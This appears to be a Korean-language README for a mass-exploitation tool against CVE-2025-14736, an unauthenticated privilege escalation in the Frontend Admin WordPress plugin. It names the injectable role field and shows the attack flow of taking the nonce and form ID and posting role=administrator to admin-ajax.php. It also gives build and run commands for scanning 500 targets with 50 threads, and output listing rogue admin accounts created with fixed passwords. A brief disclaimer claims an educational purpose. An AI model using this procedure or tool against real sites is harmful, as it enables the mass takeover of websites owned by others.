
역할 양식 필드를 통한 인증되지 않은 관리자 권한 상승
작성자: Hyun Chiya
| 필드 | 값 |
|---|---|
| CVE ID | CVE-2025-14736 |
| 플러그인 | Frontend Admin by DynamiApps |
| 영향받는 버전 | <= 3.28.25 |
| 취약점 유형 | 인증되지 않은 권한 상승 |
| 심각도 | 치명적 |
WordPress용 Frontend Admin 플러그인은 등록 중 사용자 제어 필드에 대한 충분하지 않은 검증으로 인해 인증되지 않은 권한 상승에 취약합니다. 공격자는 양식 제출 페이로드를 조작하여 administrator를 포함한 임의의 역할을 주입할 수 있습니다.
취약한 로직은 사용자가 해당 역할을 할당할 권한이 있는지 확인하지 않고 role 필드를 사용자 입력으로 신뢰하는 양식 제출 처리에 있습니다. 구체적으로 acff[user][field_user_role_ID] 필드를 administrator로 수정할 수 있습니다.
flowchart TD
A["Attacker visits Registration Page"] --> B["Extract Nonce (_acf_nonce) & Form ID (_acf_form)"]
B --> C["Construct POST payload with 'role'='administrator'"]
C --> D["POST to /wp-admin/admin-ajax.php"]
D --> E{"Verification"}
E -->|Success| F["New Admin User Created"]
style F fill:#ff6b6b,stroke:#c92a2a,color:#fff
go build -o mass_exploit.exe mass_exploit.go
.\mass_exploit.exe -l list.txt -t 50
| 인자 | 설명 |
|---|---|
-l | 대상 URL 목록 경로 (기본값: list.txt) |
-t | 동시 스레드 수 (기본값: 10) |
-timeout | 요청 시간 제한(초) (기본값: 15) |
>> [ ONLINE ]
╔═══════════════════════════════════════════════════════════════════════════════════════╗
║ CVE-2025-14736 - Mass Exploit Tool ║
║ Frontend Admin by DynamiApps Privilege Escalation ║
║ Author: Hyun Chiya ║
╚═══════════════════════════════════════════════════════════════════════════════════════╝
>> [ INFORMATION ]
[*] Loaded 500 targets. Starting scan with 50 threads...
[SUCCESS] http://target.com | User: hacker_mass | Pass: Password123! | FormID: 48
[SUCCESS] http://example.org | User: hacker_mass | Pass: Password123! | FormID: 32
[*] Scan complete.
이 도구는 교육 및 승인된 보안 테스트 목적으로만 제공됩니다. 컴퓨터 시스템에 대한 무단 접근은 불법입니다. 책임감 있게 사용하십시오.
Hyun Chiya